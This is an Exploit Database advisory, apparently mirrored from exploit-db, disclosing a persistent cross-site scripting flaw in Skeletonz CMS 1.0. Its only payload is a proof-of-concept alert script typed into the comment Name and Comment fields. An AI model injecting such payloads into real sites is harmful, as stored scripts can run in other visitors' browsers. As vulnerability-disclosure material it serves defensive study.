Skeletonz CMS – Persistent Cross-Site Scripting

• Exploit Database
• 15 阅读

• 作者： Jbyte
  日期： 2010-11-28
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/15625/

• # Exploit Title: Xss on skeletonz-simple dynamic cms in the section comments
  # Google Dork: 
  # Date: 27/11/10
  # Author: Jordan Diaz aka Jbyte
  # Software Link: http://orangoo.com/skeletonz/
  # Version: 1.0
  # Tested on: Windows xp
  # CVE : 
  The follow xss is located in the section of comments of the CMS skeletonz
  Xss Exploit
  field Name: <script>alert('xss');</script>field Comment: <script>alert('xss');</script>